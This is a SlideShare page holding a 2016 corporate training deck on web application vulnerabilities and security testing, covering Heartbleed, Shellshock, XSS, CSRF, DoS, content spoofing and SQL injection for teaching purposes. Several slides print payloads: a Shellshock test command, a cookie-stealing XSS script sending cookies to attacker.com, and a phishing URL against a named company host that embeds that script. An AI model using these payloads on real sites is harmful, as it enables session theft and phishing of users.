Enviar pesquisa
Carregar
Security_Testing_Presentation
•
0 gostou
•
598 visualizações
R
Razil Shaik
Seguir
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 31
Recomendados
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
Ishan Girdhar
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
Ajin Abraham
Web Security
Web Security
Chatree Kunjai
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
Soham Kansodaria
DVWA BruCON Workshop
DVWA BruCON Workshop
testuser1223
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
How to measure your security response readiness?
How to measure your security response readiness?
Tomasz Jakubowski
Recomendados
nCircle Webinar: Get your Black Belt
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
Pentesting With Web Services in 2012
Pentesting With Web Services in 2012
Ishan Girdhar
Injecting Security into Web apps at Runtime Whitepaper
Injecting Security into Web apps at Runtime Whitepaper
Ajin Abraham
Web Security
Web Security
Chatree Kunjai
DVWA(Damn Vulnerabilities Web Application)
DVWA(Damn Vulnerabilities Web Application)
Soham Kansodaria
DVWA BruCON Workshop
DVWA BruCON Workshop
testuser1223
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
Avoiding Application Attacks: A Guide to Preventing the OWASP Top 10 from Hap...
IBM Security
How to measure your security response readiness?
How to measure your security response readiness?
Tomasz Jakubowski
Web Apps Security
Web Apps Security
Victor Bucutea
Web Hacking
Web Hacking
Information Technology
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Ajin Abraham
Appsec XSS Case Study
Appsec XSS Case Study
Mohamed Ridha CHEBBI, CISSP
Web application penetration testing
Web application penetration testing
Imaginea
Waf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
Bank One App Sec Training
Bank One App Sec Training
Mike Spaulding
Writing Secure Code – Threat Defense
Writing Secure Code – Threat Defense
amiable_indian
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
Web Application Frewall
Web Application Frewall
Abhishek Singh
Cq3210191021
Cq3210191021
IJMER
Beyond the OWASP Top 10
Beyond the OWASP Top 10
iphonepentest
Network penetration testing
Network penetration testing
Imaginea
Why You Need A Web Application Firewall
Why You Need A Web Application Firewall
Port80 Software
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
GreenD0g
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing Services
Bulent Buyukkahraman
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
WrikeTechClub
Security testing operation vijay
Security testing operation vijay
lavanyam210
Mais conteúdo relacionado
Mais procurados
Web Apps Security
Web Apps Security
Victor Bucutea
Web Hacking
Web Hacking
Information Technology
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Ajin Abraham
Appsec XSS Case Study
Appsec XSS Case Study
Mohamed Ridha CHEBBI, CISSP
Web application penetration testing
Web application penetration testing
Imaginea
Waf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
CODE BLUE
Bank One App Sec Training
Bank One App Sec Training
Mike Spaulding
Writing Secure Code – Threat Defense
Writing Secure Code – Threat Defense
amiable_indian
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Ajith Kp
Web Application Frewall
Web Application Frewall
Abhishek Singh
Cq3210191021
Cq3210191021
IJMER
Beyond the OWASP Top 10
Beyond the OWASP Top 10
iphonepentest
Network penetration testing
Network penetration testing
Imaginea
Why You Need A Web Application Firewall
Why You Need A Web Application Firewall
Port80 Software
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
GreenD0g
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing Services
Bulent Buyukkahraman
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
Mais procurados
(20)
Web Apps Security
Web Apps Security
Web Hacking
Web Hacking
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Hacking Samsung's Tizen: The OS of Everything - Hack In the Box 2015
Appsec XSS Case Study
Appsec XSS Case Study
Web application penetration testing
Web application penetration testing
Waf bypassing Techniques
Waf bypassing Techniques
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
[CB16] Electron - Build cross platform desktop XSS, it’s easier than you thin...
Bank One App Sec Training
Bank One App Sec Training
Writing Secure Code – Threat Defense
Writing Secure Code – Threat Defense
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSE
Web Application Frewall
Web Application Frewall
Cq3210191021
Cq3210191021
Beyond the OWASP Top 10
Beyond the OWASP Top 10
Network penetration testing
Network penetration testing
Why You Need A Web Application Firewall
Why You Need A Web Application Firewall
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Axoss Web Application Penetration Testing Services
Axoss Web Application Penetration Testing Services
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Destaque
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
WrikeTechClub
Security testing operation vijay
Security testing operation vijay
lavanyam210
Xss what the heck-!
Xss what the heck-!
VodqaBLR
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
Minded Security
Information gathering using windows command line utility
Information gathering using windows command line utility
Vishal Kumar
Security testing
Security testing
Rihab Chebbah
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of Us
Eoin Woods
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
Iosif Itkin
PL-SQL DIFFERENT PROGRAMS
PL-SQL DIFFERENT PROGRAMS
raj upadhyay
Software Security Engineering
Software Security Engineering
Marco Morana
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
Sam Bowne
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
Sam Bowne
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
DevSecCon
Sql injection
Sql injection
Zidh
Sql injection
Sql injection
Pallavi Biswas
Software Security Metrics
Software Security Metrics
Cigital
Security of software defined networking (sdn) and cognitive radio network (crn)
Security of software defined networking (sdn) and cognitive radio network (crn)
Ameer Sameer
Software Engineering ppt
Software Engineering ppt
shruths2890
Dbms and rdbms ppt
Dbms and rdbms ppt
rahul kapoliya
Introduction To Software Engineering
Introduction To Software Engineering
Leyla Bonilla
Destaque
(20)
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
Dmitriy Desyatkov "Secure SDLC or Security Culture to be or not to be"
Security testing operation vijay
Security testing operation vijay
Xss what the heck-!
Xss what the heck-!
Matteo meucci Software Security - Napoli 10112016
Matteo meucci Software Security - Napoli 10112016
Information gathering using windows command line utility
Information gathering using windows command line utility
Security testing
Security testing
Secure by Design - Security Design Principles for the Rest of Us
Secure by Design - Security Design Principles for the Rest of Us
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
TMPA-2017: Regression Testing with Semiautomatic Test Selection for Auditing ...
PL-SQL DIFFERENT PROGRAMS
PL-SQL DIFFERENT PROGRAMS
Software Security Engineering
Software Security Engineering
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 10: Attacking Back-End Components
CNIT 129S: 10: Attacking Back-End Components
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
DevSecCon Asia 2017 Ante Gulam: Integrating crowdsourced security into agile ...
Sql injection
Sql injection
Sql injection
Sql injection
Software Security Metrics
Software Security Metrics
Security of software defined networking (sdn) and cognitive radio network (crn)
Security of software defined networking (sdn) and cognitive radio network (crn)
Software Engineering ppt
Software Engineering ppt
Dbms and rdbms ppt
Dbms and rdbms ppt
Introduction To Software Engineering
Introduction To Software Engineering
Semelhante a Security_Testing_Presentation
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
CA API Management
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
distortdistort
Gestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazas
Nextel S.A.
Web Application Security
Web Application Security
Abdul Wahid
The waf book intro attack elements v1.0 lior rotkovitch
The waf book intro attack elements v1.0 lior rotkovitch
Lior Rotkovitch
Cyber ppt
Cyber ppt
karthik menon
Web Intrusion Detection
Web Intrusion Detection
Abhishek Singh
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
Wail Hassan
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Alan Kan
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Cenzic
Visibility & Security for the Virtualized Enterprise
Visibility & Security for the Virtualized Enterprise
EMC
Visibility & Security for the Virtualized Enterprise
Visibility & Security for the Virtualized Enterprise
EMC
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
MattKilner
React security vulnerabilities
React security vulnerabilities
AngelinaJasper
Security Best Practices
Security Best Practices
Clint Edmonson
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
Get Ready for Web Application Security Testing
Get Ready for Web Application Security Testing
Alan Kan
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Symantec
Solution Brief
Solution Brief
webhostingguy
Novell GroupWise Multiple Untrusted Pointer Dereferences Exploitation
Novell GroupWise Multiple Untrusted Pointer Dereferences Exploitation
High-Tech Bridge SA (HTBridge)
Semelhante a Security_Testing_Presentation
(20)
Layer 7 Technologies: Web Services Hacking And Hardening
Layer 7 Technologies: Web Services Hacking And Hardening
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
Gestiona el riesgo de las grandes amenazas
Gestiona el riesgo de las grandes amenazas
Web Application Security
Web Application Security
The waf book intro attack elements v1.0 lior rotkovitch
The waf book intro attack elements v1.0 lior rotkovitch
Cyber ppt
Cyber ppt
Web Intrusion Detection
Web Intrusion Detection
Module 12 (web application vulnerabilities)
Module 12 (web application vulnerabilities)
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
Security in the cloud protecting your cloud apps
Security in the cloud protecting your cloud apps
Visibility & Security for the Virtualized Enterprise
Visibility & Security for the Virtualized Enterprise
Visibility & Security for the Virtualized Enterprise
Visibility & Security for the Virtualized Enterprise
Security in the Real World - JavaOne 2013
Security in the Real World - JavaOne 2013
React security vulnerabilities
React security vulnerabilities
Security Best Practices
Security Best Practices
Rich Web App Security - Keeping your application safe
Rich Web App Security - Keeping your application safe
Get Ready for Web Application Security Testing
Get Ready for Web Application Security Testing
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Protect Your IT Infrastructure from Zero-Day Attacks and New Vulnerabilities
Solution Brief
Solution Brief
Novell GroupWise Multiple Untrusted Pointer Dereferences Exploitation
Novell GroupWise Multiple Untrusted Pointer Dereferences Exploitation
Security_Testing_Presentation
1.
©2012 Trimble Navigation
Limited©2012 Trimble Navigation Limited Web Application Vulnerabilities & Security Testing 18 Jul 2016 ~ Rajil
2.
©2012 Trimble Navigation
Limited Objective The primary objective is to give a brief introduction of critical & potential vulnerabilities in a web application. Over view of security testing techniques to detect for underlying vulnerabilities or security holes in a web applications. Web Application Vulnerabilities & Security Testing
3.
©2012 Trimble Navigation
Limited We do security testing for Confidentiality Privileges Escalation. Data Integrity Web Application Vulnerabilities & Security Testing
4.
©2012 Trimble Navigation
Limited Tools Used Nmap Zed Attack Proxy (ZAP) Metasploit Web Application Vulnerabilities & Security Testing
5.
©2012 Trimble Navigation
Limited Demo Systems CentOS Machine Windows 2008 Server Kali Linux (Attacker) Web Application Vulnerabilities & Security Testing
6.
©2012 Trimble Navigation
Limited Heart bleed Shell Shock Cross Site Scripting (XSS) Cross Site Request Forgery (CSRF) SQL Injection & Error Messages DoS & Buffer Overflow Content Spoofing Web Application Vulnerabilities & Security Testing
7.
©2012 Trimble Navigation
Limited Heart bleed Heart bleed is a security bug in openSSL cryptography library, which is widely used to implement Transport Security Layer Protocol heartbeat functionality; this is because of improper input validation for boundary check. The vulnerability is classified as a buffer over-read, a situation where more data can be read than should be allowed. The bug name has been derived from "Heartbeat". It was publicly disclosed in April 2014. Web Application Vulnerabilities & Security Testing
8.
©2012 Trimble Navigation
Limited Heart Bleed Web Application Vulnerabilities & Security Testing
9.
©2012 Trimble Navigation
Limited Heart Bleed OpenSSL 1.0.1 through 1.0.1f are vulnerable. OpenSSL 1.0.1g was released to address this vulnerability List of vulnerable websites https://zmap.io/heartbleed/ http://www.tjkelly.com/blog/heartbleed-website-list/ To test online https://sslanalyzer.comodoca.com/heartbleed.html https://filippo.io/Heartbleed/ Web Application Vulnerabilities & Security Testing
10.
©2012 Trimble Navigation
Limited Heart Bleed Leaked data from vulnerable website Web Application Vulnerabilities & Security Testing
11.
©2012 Trimble Navigation
Limited Shellshock Shell shock is also known as Bash Door, it was disclosed on 24th Sept 2014. Any webserver running on vulnerable Linux or UNIX machines will allow the attacker to execute arbitrary shell commands on the target machine. Windows OS is not vulnerable to this. Web Application Vulnerabilities & Security Testing
12.
©2012 Trimble Navigation
Limited Shellshock Web Application Vulnerabilities & Security Testing
13.
©2012 Trimble Navigation
Limited Shellshock To test if the system is vulnerable, issue the below command in Unix or Linux machines. env x='() { :;}; echo vulnerable' bash -c 'echo hello' Web Application Vulnerabilities & Security Testing
14.
©2012 Trimble Navigation
Limited Cross Site Scripting (XSS) This is a hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim. XSS enables the attackers to inject client-side script into Web pages viewed by other users. XSS allows attackers to execute script in the victim’s browser which can hijack user sessions, or redirect the user to malicious sites. XSS leads to session hijacking. There two types of XSS. Stored XSS Reflected XSS Web Application Vulnerabilities & Security Testing
15.
©2012 Trimble Navigation
Limited Cross Site Scripting (XSS) <script>alert(‘hello’)</script> Web Application Vulnerabilities & Security Testing
16.
©2012 Trimble Navigation
Limited Cross Site Scripting (XSS) Web Application Vulnerabilities & Security Testing
17.
©2012 Trimble Navigation
Limited Cross Site Scripting (XSS) Cookie Stealing: <script>document.location='http://attacker.com/tinylogger.php?cooki e='.concat(escape(document.cookie));</script> Web Application Vulnerabilities & Security Testing
18.
©2012 Trimble Navigation
Limited Cross Site Request Forgery (CSRF) A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests; the vulnerable application thinks these requests are legitimate. Web Application Vulnerabilities & Security Testing
19.
©2012 Trimble Navigation
Limited Cross Site Request Forgery (CSRF) Attacker will send a malicious link to the victim by some means like social websites, chat or email. This link may seems very interesting to the victim. Once the victim clicked this link, then without his knowledge, browser sends forged requests to the server to perform some action. Web Application Vulnerabilities & Security Testing
20.
©2012 Trimble Navigation
Limited Denial Of Service Attacks (DoS or DDoS) This attack is an attempt to make a machine or network resource unavailable to its intended users. One common method of attack involves saturating the target machine with external communications requests, such that it cannot respond to legitimate traffic, or responds so slowly. This attack consumes the target computer all resources so that it can no longer provide its intended service. A distributed denial-of-service (DDoS) is where the attack source is more than one, often thousands of, unique IP addresses. Web Application Vulnerabilities & Security Testing
21.
©2012 Trimble Navigation
Limited Denial Of Service Attacks (DoS or DDoS) Types of DoS Attacks ICMP flood SYN flood Ping flood (Ping of Death) Peer-to-peer attacks Application Level Floods Web Application Vulnerabilities & Security Testing
22.
©2012 Trimble Navigation
Limited Denial Of Service Attacks (DoS or DDoS) Application Level DoS Attack Some of DoS attacks rely on software related exploits such as buffer overflows. These attacks Cause the application to fill the disk space or consume all available memory or CPU cycles. Buffer overflow While a program writing data in to a buffer, over runs buffer’s boundary and overwrites the adjacent memory locations. This may result in erratic program behavior, including memory access errors, incorrect results, or a crash. Web Application Vulnerabilities & Security Testing
23.
©2012 Trimble Navigation
Limited Content Spoofing Content spoofing, also referred to as content injection or virtual defacement, is an attack targeting a user made possible by injection vulnerability in a web application. When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user. This presents the user with a modified page under the context of the trusted domain. This attack is typically used as in conjunction with phishing attacks. Web Application Vulnerabilities & Security Testing
24.
©2012 Trimble Navigation
Limited Content Spoofing Sample Phishing email Web Application Vulnerabilities & Security Testing
25.
©2012 Trimble Navigation
Limited Content Spoofing Once the victim clicked on the malicious links from that email, it will display the spoofed content in the vulnerable application. Payload https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<H1><b>Some malicious activity detected on your acount, kindly <a href="https://eugmrel.road.com/apps/apm/jspServer/PasswordAlert.jsp?msg=<script>doc ument.location='http://attacker.com/tinylogger1.php?cookie='.concat(escape(document.co okie));</script>">Click Here</a> to change the password immediately !!!</b></h1> Web Application Vulnerabilities & Security Testing
26.
©2012 Trimble Navigation
Limited SQL Injection SQL injection is a technique where malicious users can inject SQL commands into an SQL statement, via web page input. Injected SQL commands can alter SQL statement and compromise the security of a web application. Web Application Vulnerabilities & Security Testing
27.
©2012 Trimble Navigation
Limited SQL Injection Web Application Vulnerabilities & Security Testing
28.
©2012 Trimble Navigation
Limited SQL Injection Web Application Vulnerabilities & Security Testing
29.
©2012 Trimble Navigation
Limited Error Messages Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function. Error Message 1: java.sql.SQLSyntaxErrorException: ORA-00942: Table or View doesn’t exist at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:91) at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112) at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413) at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030) at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194) at oracle.jdbc.driver.T4CPreparedStatement.executeForDescribe(T4CPreparedStatement.java:785) at oracle.jdbc.driver.T4CPreparedStatement.executeMaybeDescribe(T4CPreparedStatement.java:860) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:1186) Web Application Vulnerabilities & Security Testing
30.
©2012 Trimble Navigation
Limited Error Messages Error Message 2: java.sql.SQLException: ORA-12899: value too large for column "ROVER"."DRIVER"."DESCRIPTION" (actual: 183, maximum: 80) at oracle.jdbc.driver.SQLStateMapping.newSQLException(SQLStateMapping.java:70) at oracle.jdbc.driver.DatabaseError.newSQLException(DatabaseError.java:112) at oracle.jdbc.driver.DatabaseError.throwSqlException(DatabaseError.java:173) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:455) at oracle.jdbc.driver.T4CTTIoer.processError(T4CTTIoer.java:413) at oracle.jdbc.driver.T4C8Oall.receive(T4C8Oall.java:1030) at oracle.jdbc.driver.T4CPreparedStatement.doOall8(T4CPreparedStatement.java:194) Web Application Vulnerabilities & Security Testing
31.
©2012 Trimble Navigation
Limited Thank You Web Application Vulnerabilities & Security Testing